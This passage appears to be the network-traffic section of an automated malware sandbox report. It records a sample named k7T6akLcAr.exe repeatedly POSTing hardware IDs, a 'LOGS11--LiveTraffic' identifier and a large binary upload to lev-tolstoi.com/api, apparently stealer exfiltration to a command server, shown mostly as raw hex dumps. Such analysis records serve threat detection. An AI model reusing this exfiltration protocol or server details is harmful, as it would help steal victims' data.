                                                                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1986&min_rtt=1982&rtt_var=751&sent=10&recv=21&lost=0&retrans=0&sent_bytes=2835&recv_bytes=15980&delivery_rate=1449851&cwnd=206&unsent_bytes=0&cid=43575a31a7050a27&ts=963&x=0"
                                                                                                                                                                                                                                                                      2024-12-28 08:40:49 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                                                      Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                                                      2024-12-28 08:40:49 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                      5192.168.2.649734172.67.157.2544436032C:\Users\user\Desktop\k7T6akLcAr.exe
                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                      2024-12-28 08:40:51 UTC273OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=88L03U2R39
                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                      Content-Length: 19921
                                                                                                                                                                                                                                                                      Host: lev-tolstoi.com
                                                                                                                                                                                                                                                                      2024-12-28 08:40:51 UTC15331OUTData Raw: 2d 2d 38 38 4c 30 33 55 32 52 33 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 43 37 31 42 42 30 39 43 43 36 33 46 31 32 42 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 38 38 4c 30 33 55 32 52 33 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 38 38 4c 30 33 55 32 52 33 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 38 38 4c 30 33 55 32 52 33 39 0d 0a 43 6f
                                                                                                                                                                                                                                                                      Data Ascii: --88L03U2R39Content-Disposition: form-data; name="hwid"1C71BB09CC63F12BBEBA0C6A975F1733--88L03U2R39Content-Disposition: form-data; name="pid"3--88L03U2R39Content-Disposition: form-data; name="lid"LOGS11--LiveTraffic--88L03U2R39Co
                                                                                                                                                                                                                                                                      2024-12-28 08:40:51 UTC4590OUTData Raw: 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 d1 e8 b0 32 f0 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8b 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 d1 e8 b0 32 f0 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8d 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 b1 e8 ef fa 6f c5 82 3f 0c fe 4d 70 35 98 09 ee b9 f1 d3 1b 7f 70 e3 5f de a8 de f8 f4 8d d8 f5 6f 86 49 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                      Data Ascii: ?2+?2+?o?Mp5p_oI
                                                                                                                                                                                                                                                                      2024-12-28 08:40:52 UTC1123INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                      Date: Sat, 28 Dec 2024 08:40:51 GMT
                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                      Set-Cookie: PHPSESSID=anbltkm7j935i8ifg00hli848r; expires=Wed, 23 Apr 2025 02:27:30 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                      X-Frame-Options: DENY
                                                                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                      vary: accept-encoding
                                                                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EYA9r29yx95OfqEYe6oQVVNuBlBGmXUcdjhbxBCWiE3oJsm9PsL6dYCohM5wtSd89ySgzpLaopGFGe%2FoXCJizRhlQ4RdPpfiofW3KAOz1XWLndPTafozaIsLAaUIRnpW8FY%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                                                                      CF-RAY: 8f903f78cad242a0-EWR
                                                                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1746&min_rtt=1745&rtt_var=656&sent=10&recv=24&lost=0&retrans=0&sent_bytes=2835&recv_bytes=20874&delivery_rate=1664766&cwnd=225&unsent_bytes=0&cid=363d5f53cbecb6dd&ts=975&x=0"
                                                                                                                                                                                                                                                                      2024-12-28 08:40:52 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                                                      Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                                                      2024-12-28 08:40:52 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                      6192.168.2.649745172.67.157.2544436032C:\Users\user\Desktop\k7T6akLcAr.exe
                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                      2024-12-28 08:40:53 UTC276OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=3M7PF216BJCAA9
                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                      Content-Length: 1204
                                                                                                                                                                                                                                                                      Host: lev-tolstoi.com
                                                                                                                                                                                                                                                                      2024-12-28 08:40:53 UTC1204OUTData Raw: 2d 2d 33 4d 37 50 46 32 31 36 42 4a 43 41 41 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 43 37 31 42 42 30 39 43 43 36 33 46 31 32 42 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 33 4d 37 50 46 32 31 36 42 4a 43 41 41 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 33 4d 37 50 46 32 31 36 42 4a 43 41 41 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 33 4d
                                                                                                                                                                                                                                                                      Data Ascii: --3M7PF216BJCAA9Content-Disposition: form-data; name="hwid"1C71BB09CC63F12BBEBA0C6A975F1733--3M7PF216BJCAA9Content-Disposition: form-data; name="pid"1--3M7PF216BJCAA9Content-Disposition: form-data; name="lid"LOGS11--LiveTraffic--3M
                                                                                                                                                                                                                                                                      2024-12-28 08:40:54 UTC1129INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                      Date: Sat, 28 Dec 2024 08:40:54 GMT
                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                      Set-Cookie: PHPSESSID=i8q9ldjh7bl0pvgsoobj1l79bh; expires=Wed, 23 Apr 2025 02:27:33 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                      X-Frame-Options: DENY
                                                                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                      vary: accept-encoding
                                                                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XzARxalyQOCUu%2Fe0tOJ83LfeJkE1YodUMZZN2phxW571ZDoGKI2j3h4jDpJAnQKVBSHIhG96nbTIEL0tpRV93l5h%2Fct1CGacmnqd5nYYSe2Ka%2FGRKSs%2F%2BLAiKr5qe6Qw6tw%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                                                                      CF-RAY: 8f903f8938d043bd-EWR
                                                                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1666&min_rtt=1661&rtt_var=634&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2834&recv_bytes=2116&delivery_rate=1710603&cwnd=190&unsent_bytes=0&cid=d8623edfaebd4960&ts=1146&x=0"
                                                                                                                                                                                                                                                                      2024-12-28 08:40:54 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                                                      Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                                                      2024-12-28 08:40:54 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                      7192.168.2.649752172.67.157.2544436032C:\Users\user\Desktop\k7T6akLcAr.exe
                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                      2024-12-28 08:40:56 UTC272OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=BQB73OBF
                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                      Content-Length: 570960
                                                                                                                                                                                                                                                                      Host: lev-tolstoi.com
                                                                                                                                                                                                                                                                      2024-12-28 08:40:56 UTC15331OUTData Raw: 2d 2d 42 51 42 37 33 4f 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 43 37 31 42 42 30 39 43 43 36 33 46 31 32 42 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 42 51 42 37 33 4f 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 42 51 42 37 33 4f 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 42 51 42 37 33 4f 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69
                                                                                                                                                                                                                                                                      Data Ascii: --BQB73OBFContent-Disposition: form-data; name="hwid"1C71BB09CC63F12BBEBA0C6A975F1733--BQB73OBFContent-Disposition: form-data; name="pid"1--BQB73OBFContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic--BQB73OBFContent-Di
                                                                                                                                                                                                                                                                      2024-12-28 08:40:56 UTC15331OUTData Raw: 34 48 5a dd 09 0f 01 58 83 f0 61 05 29 bf 0a 88 86 4a 43 54 5a 36 79 41 88 b3 e2 ea 65 0a d7 8f 57 27 4f 92 8a b7 43 2c c4 0e fd e9 7a 38 6d 34 dc f3 d3 b5 f7 21 c4 f0 31 33 74 ec 04 a3 4d 6e e2 5e 00 cf 4b ee 6c a2 7b f2 d9 0c 85 6b b8 d2 72 5f 0b 56 a0 b5 70 e9 e2 74 c6 48 20 4b e1 39 47 2f 9e b2 91 a0 60 59 d4 85 3b a1 93 dd ec af 02 be 3e a0 df 78 a5 d2 a0 2c 1a b1 69 e1 ba fd 6b c8 a6 65 ab b8 17 4d 39 12 d6 22 57 71 c0 6d 10 52 42 13 30 12 a5 a0 33 d2 f8 58 18 52 80 ed 98 82 cb 64 0b 24 ab 0c 01 e1 f4 5f f3 2d 4b 71 45 e5 68 25 70 31 54 b7 62 fd 75 3f 7d 10 ef 79 9d 39 c3 52 e5 dd e9 db b9 af d3 62 00 9e c6 9c 00 af 57 0b 2a d7 4b a3 15 b4 e5 d4 71 5b 22 9c fd 12 27 86 cb d4 19 14 7d 01 68 93 b0 bd 67 ae d6 10 1f 1e 1d 5e 93 bc ac 18 bf 7d 70 e3 78
                                                                                                                                                                                                                                                                      Data Ascii: 4HZXa)JCTZ6yAeW'OC,z8m4!13tMn^Kl{kr_VptH K9G/`Y;>x,ikeM9"WqmRB03XRd$_-KqEh%p1Tbu?}y9RbW*Kq["'}hg^}px
                                                                                                                                                                                                                                                                      2024-12-28 08:40:56 UTC15331OUTData Raw: d5 9f bb 65 9b 65 d2 d0 75 73 5b ab 46 55 6a 15 40 73 ed 19 28 56 f3 fd d5 7f 21 d9 f4 af d8 f3 2f e3 f9 74 6e 01 25 30 ae 95 74 4f f9 6f 7b d1 b7 59 fe 5c 88 75 e5 2f 82 14 5c 79 0c 8f 24 61 09 98 d8 60 f8 e0 a2 5a 29 77 d7 aa 81 96 3f ee 82 31 33 68 3b 89 87 1b 42 02 af a7 a2 9e ca 95 e8 7a e7 28 36 e9 6f ec 3a 2a 97 b8 d0 b0 82 af 30 cb ee cd fa 8c 7d 22 6c 29 13 51 0e 14 07 d9 a4 e4 dd 72 7e dc 12 66 d4 1b e0 72 e1 50 9a 80 51 33 7d 27 34 a1 d7 40 6e d2 6a a4 24 fe d6 fe 17 2c 87 61 12 25 e5 27 f8 a8 04 e6 b5 2f 3f 5a 7d fb f0 d6 d9 89 60 39 3d 84 34 fb 94 97 34 39 b3 3a 56 43 a9 e2 96 ee 4f 2b ee d4 de 98 39 41 1d 7c a7 c5 6b 52 ba b3 62 42 cc fe 1f eb 55 93 c9 cc f6 ed 77 61 7f e7 64 a2 ea 25 48 56 2c 33 0d ee 23 0f cd bd 81 1c 68 a2 ab d6 d5 95 fd
                                                                                                                                                                                                                                                                      Data Ascii: eeus[FUj@s(V!/tn%0tOo{Y\u/\y$a`Z)w?13h;Bz(6o:*0}"l)Qr~frPQ3}'4@nj$,a%'/?Z}`9=449:VCO+9A|kRbBUwad%HV,3#h
                                                                                                                                                                                                                                                                      2024-12-28 08:40:56 UTC15331OUTData Raw: 91 c4 d0 2c d2 e5 42 ab 33 e3 4d bf 1c a8 4d 6f 5c 2f f0 1f 92 22 8d 6a df 95 d2 de 61 94 f4 30 56 05 73 41 1a 47 26 dc 4b e9 f7 f4 28 bf 08 92 fc 92 80 ad 27 ee ca 5d c7 4a c5 97 78 ad 6e 76 25 8a d5 da 4d d9 1e 48 9b 0c 9a 1b 71 85 20 69 b6 62 d9 78 29 40 98 f5 aa 80 bb 55 1f d6 e9 88 57 1e 07 22 6d 95 25 c9 3e c6 7b b2 3f fe ea 33 73 e9 32 33 4d 45 4b 01 37 2e a9 43 82 0d 61 21 0e 0d 0b 9e f1 e6 62 7d c2 df 86 64 9a ef f9 33 ba 52 88 a9 8a d9 49 f7 41 d2 f6 fd 3a c7 d4 d8 1b 0a 99 41 98 2b c7 75 b9 80 fe 8b a6 81 3d a3 1e 7b e3 4a 57 99 39 3a 82 b5 0c 85 8e 7f af 0d a4 eb e2 9c 61 a9 81 8b cf cb 79 37 d5 96 0b c2 a4 a0 8e 47 ee 69 68 c6 87 f0 e8 ab 24 3e b0 9e f3 28 8a f1 54 1b 70 7f c4 69 9a 0e 32 1b 84 eb bc f2 7c d9 bb 96 ed 98 b5 ab 6e 8d 7c a3 32
                                                                                                                                                                                                                                                                      Data Ascii: ,B3MMo\/"ja0VsAG&K(']Jxnv%MHq ibx)@UW"m%>{?3s23MEK7.Ca!b}d3RIA:A+u={JW9:ay7Gih$>(Tpi2|n|2
                                                                                                                                                                                                                                                                      2024-12-28 08:40:56 UTC15331OUTData Raw: 33 f5 8f f3 1a 39 23 0d a4 ed b3 b1 fa c9 89 8d 44 03 a8 bd 44 f2 ce d6 3e 3d 7e 53 bd b4 3f c1 cc 73 dd 9b bc ab 6a f3 05 02 df ff 4b e0 5a da 54 d0 7a 2a 82 8f 89 98 e2 b7 67 d6 6a 87 d7 88 7f 70 6b c0 04 e6 56 0c 72 62 d0 51 21 0a 10 5d 01 22 40 f6 f7 5f 1b 03 9f a5 35 05 5e 90 5d 55 e1 76 ec 59 ae 79 24 a9 8a 84 aa bc 5d 26 18 a6 64 70 57 6a 7f 7f 94 c6 99 f0 da 81 e5 60 3a f5 51 34 bc 04 0d 16 bd aa da 8a d4 2a 96 fd ff 7d ce ff 7b a9 44 e8 35 42 a0 31 96 c2 0c 36 a0 7f 94 60 dc e8 8f 90 ff 47 86 ea ab 84 f3 04 8f de 04 ce a6 ff 17 19 28 c2 51 47 c1 17 05 49 0e 4c ff ca 9b 44 4e a2 43 a3 74 21 c0 cf 27 7e 27 44 07 65 de 22 57 99 45 10 71 ab 3b cf e4 0c 37 9d 8f 7e bc e0 66 46 4a 40 25 1f 81 cd 4f ba 19 bf 80 9b 8b 38 22 1b 97 4b ac e2 31 33 6f ba 58
                                                                                                                                                                                                                                                                      Data Ascii: 39#DD>=~S?sjKZTz*gjpkVrbQ!]"@_5^]UvYy$]&dpWj`:Q4*}{D5B16`G(QGILDNCt!'~'De"WEq;7~fFJ@%O8"K13oX
                                                                                                                                                                                                                                                                      2024-12-28 08:40:56 UTC15331OUTData Raw: 6c 4c 82 e8 f7 94 18 27 31 20 68 37 e3 3e 0e 88 f7 84 72 33 c6 dd 26 78 40 8f 34 cc bb 69 00 c1 12 2c f9 bd 20 1f 87 5a f5 e6 22 9f d6 ce 4f 85 ba 0e 8c e4 9d 00 d9 f4 a6 3b 9b 9f f8 74 4b 37 6f c7 a7 c7 d5 2e 68 fb a7 93 4c 60 93 a0 29 fd fc e4 92 f5 1c e5 24 6f bd a8 75 0a 4c 09 32 f2 fc d8 e2 96 d2 32 97 c9 52 c6 52 2f 63 a4 34 88 24 a2 3a fa 03 b0 f5 64 21 b0 52 ec db ff 95 90 b0 70 86 a3 8e 6c b3 b1 67 23 71 6e df 41 6d d0 8e b5 02 56 4c 4b 10 27 35 8f e9 bb 1d a7 be c7 2f 2f ad b2 e2 2c 33 62 61 2d ea 13 3f 0b 42 19 f0 bc 2c c0 db 54 a6 4a 50 ba 50 78 23 67 5d 82 6b d4 91 93 ee 74 93 52 b6 df 1f 35 92 51 16 c1 ef 53 6c b8 01 1f 7e 4d bb d1 65 1c 52 f2 a8 94 11 af f9 8a 2a b5 fd a6 bb 31 1f 35 20 ec a8 a3 99 d4 84 af 37 77 24 9c 57 ca 2c c5 4d 8a 8c
                                                                                                                                                                                                                                                                      Data Ascii: lL'1 h7>r3&x@4i, Z"O;tK7o.hL`)$ouL22RR/c4$:d!Rplg#qnAmVLK'5//,3ba-?B,TJPPx#g]ktR5QSl~MeR*15 7w$W,M
                                                                                                                                                                                                                                                                      2024-12-28 08:40:56 UTC15331OUTData Raw: 7e d7 5e 40 43 62 44 2a dd 47 2e 20 69 41 75 8b 3b 7c 57 d7 c6 a9 b5 7e ce d3 25 4d 25 b6 00 cb 70 1b a2 68 84 6b 74 06 3d 64 2a ad 7f 83 18 3d 5a c3 89 79 03 ce 5f 1a a8 aa c2 20 82 8b e1 f9 09 89 ad 35 04 0f c4 47 78 3d 45 10 05 57 a7 04 3e 51 dc c4 b8 9f d9 0f c4 a0 5f 0e f4 ed ca f4 fc 5a f4 09 b9 0a 05 99 59 91 39 f5 be 47 d4 42 21 ac a7 2f b2 6d 28 73 a6 a2 6e 41 f6 db d0 b3 2a ee fa 4b 11 5a 48 68 d7 d4 a1 e2 36 74 3a 8b fa 97 e0 c6 71 28 27 8a 18 19 7d 8c 46 33 43 45 c3 51 00 de 11 f4 e9 79 d3 32 63 34 7c f9 d3 73 43 fb 9a a5 43 18 d4 2c bf 50 d1 b7 33 9c 9f bf 2a de fe 3c 22 5f c9 43 82 82 c0 13 89 10 d1 02 dd 2a a9 67 4b ba 24 81 f8 76 83 d6 1e 84 db 6d 59 88 b6 1f 0d af f9 24 02 fa 05 04 ed 06 7f eb a9 9d 1f 42 df 35 cd 2e 6d 9f f1 69 15 c7 05
                                                                                                                                                                                                                                                                      Data Ascii: ~^@CbD*G. iAu;|W~%M%phkt=d*=Zy_ 5Gx=EW>Q_ZY9GB!/m(snA*KZHh6t:q('}F3CEQy2c4|sCC,P3*<"_C*gK$vmY$B5.mi
                                                                                                                                                                                                                                                                      2024-12-28 08:40:56 UTC15331OUTData Raw: e5 f6 53 50 8e 86 3a c5 02 10 61 a3 12 29 80 dd 17 3c 28 ac 5c a1 48 53 a6 0d e7 27 ab 9b b5 e6 53 6e 4c ed 52 83 68 4f 59 4f 32 33 83 c0 68 9d f2 e3 da 79 04 cd f9 94 a5 5a a9 9c c7 3d cb 45 98 7c 07 a2 15 e7 f0 72 9b 03 28 09 5c 41 87 c6 a2 d0 ea e5 cb 1f 84 07 54 c4 e2 bf 35 66 28 f3 80 2e cd 35 18 03 8f 47 f5 3a 19 d2 68 02 d2 a4 96 9d b0 46 d0 cb e6 97 25 ff fc d3 a3 ff 28 c6 f1 88 af 6c 49 17 59 e5 3f 93 42 e2 f6 2e 05 df 91 83 7f 75 c9 82 fb dd 92 3a 0f 40 a9 c3 23 88 de d7 cd 4f 4f 92 04 fd 41 67 dc b6 d3 c0 d7 42 2f 10 88 e3 07 1c a3 2e 58 d0 dd 68 2e 92 c0 f3 12 91 76 16 94 3e 7b 9e 1a 38 73 54 bb 74 07 f0 ec 95 19 f4 0a eb 6b 8e 95 04 8f 47 eb 11 a0 4b 8b 8f 11 80 04 a7 8e 9c ad 77 3c 67 a9 9f e6 52 13 ac a9 4a d3 5b 49 39 89 b3 3e 69 58 34 90
                                                                                                                                                                                                                                                                      Data Ascii: SP:a)<(\HS'SnLRhOYO23hyZ=E|r(\AT5f(.5G:hF%(lIY?B.u:@#OOAgB/.Xh.v>{8sTtkGKw<gRJ[I9>iX4
                                                                                                                                                                                                                                                                      2024-12-28 08:40:56 UTC15331OUTData Raw: 89 67 df 7d 80 fe 3b 1f 70 ed 9b ec 59 8b ac 4a 52 9b 43 41 1f a4 72 86 6f 91 b5 6c d8 04 89 15 81 c7 03 84 f9 35 20 00 ab 6f 06 d1 36 a5 90 ef f6 d4 d6 3e 36 b1 6b 72 09 c3 93 41 6d c6 e7 4e 5e f6 49 e0 6d 5b f9 32 4f af 5c f5 3d 57 4f b2 c8 4c c7 7e 2c f1 18 17 7b af 04 c8 e9 d1 d7 c5 e7 23 ca 93 e6 b7 eb 3b 9c 11 8e 5b 77 03 bf 22 b3 a4 a5 f0 26 cf dc 57 52 82 e2 d0 15 19 13 39 26 f2 c6 a6 09 67 ed 45 39 83 6b 83 12 4e 16 e9 5a 90 90 20 7d 82 e3 f1 5b f9 cb 2e f6 5c 51 22 4b 69 f5 b4 06 65 69 26 92 2e 72 05 e0 33 71 9b c8 16 24 d7 48 93 e5 69 61 76 fc 2a 86 71 1d 37 5f b1 34 ea 71 07 90 b3 7a 89 55 ca 6c 17 4c 84 4c be 3f 49 64 58 4f e4 42 5f 46 09 7a 78 48 ec 52 fa d7 ea 63 31 b0 be e3 33 29 88 fc 20 74 92 57 e5 ba 13 d7 be b3 39 79 dd 44 5d d8 8c 5f
                                                                                                                                                                                                                                                                      Data Ascii: g};pYJRCArol5 o6>6krAmN^Im[2O\=WOL~,{#;[w"&WR9&gE9kNZ }[.\Q"Kiei&.r3q$Hiav*q7_4qzUlLL?IdXOB_FzxHRc13) tW9yD]_
                                                                                                                                                                                                                                                                      2024-12-28 08:40:56 UTC15331OUTData Raw: b4 64 99 13 87 4b 81 b7 5a 60 b5 f2 ce 99 aa 1f 13 d7 34 68 08 86 2f a1 60 58 cd 9b 41 0d 66 5a 84 8b 9b 69 f0 4a c1 b9 7c ed fe 42 6b 46 51 2b db 9c 29 6d 40 50 6b d6 85 10 ee bf 9d d1 84 57 89 82 d3 d6 0a e3 44 88 3c e5 55 4f 1a 5e 2a ac 88 de 4d 32 fe d2 5c 8e 56 84 e2 be d8 bb c1 ea 77 94 55 c3 30 61 81 6b b3 66 0f fb 76 3e aa 8a b9 b2 22 61 69 3e 2e f1 a3 b2 6f ad 75 32 3b 85 80 02 2a 3d 03 0f ff b5 72 e0 24 be 98 98 d2 00 47 9c 32 4b 08 9d 39 08 5f 60 91 92 e1 b0 40 c4 ba d7 c2 c4 d0 f3 d5 3c 1f ca 31 28 63 fb 53 1b 02 f6 84 16 ef b2 56 8e 29 86 ad dd 60 d7 c3 f4 ec 0d a4 5d e7 cb 6c 8f 7a 26 d4 33 1d 95 0e 09 7e 7c fd f5 2f 41 1b 65 21 e6 bc df c2 59 33 ca 14 8e 2e 5e 21 18 3a c9 9f e2 86 79 fd bc fa c7 66 e7 5b 9e f9 ce e0 9f 82 41 bb ea 3c 95 e6
                                                                                                                                                                                                                                                                      Data Ascii: dKZ`4h/`XAfZiJ|BkFQ+)m@PkWD<UO^*M2\VwU0akfv>"ai>.ou2;*=r$G2K9_`@<1(cSV)`]lz&3~|/Ae!Y3.^!:yf[A<
                                                                                                                                                                                                                                                                      2024-12-28 08:41:00 UTC1135INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                      Date: Sat, 28 Dec 2024 08:41:00 GMT
                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                      Set-Cookie: PHPSESSID=f65g6aqmq6v34c3eo5akmgv3c3; expires=Wed, 23 Apr 2025 02:27:37 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                      X-Frame-Options: DENY
                                                                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                      vary: accept-encoding
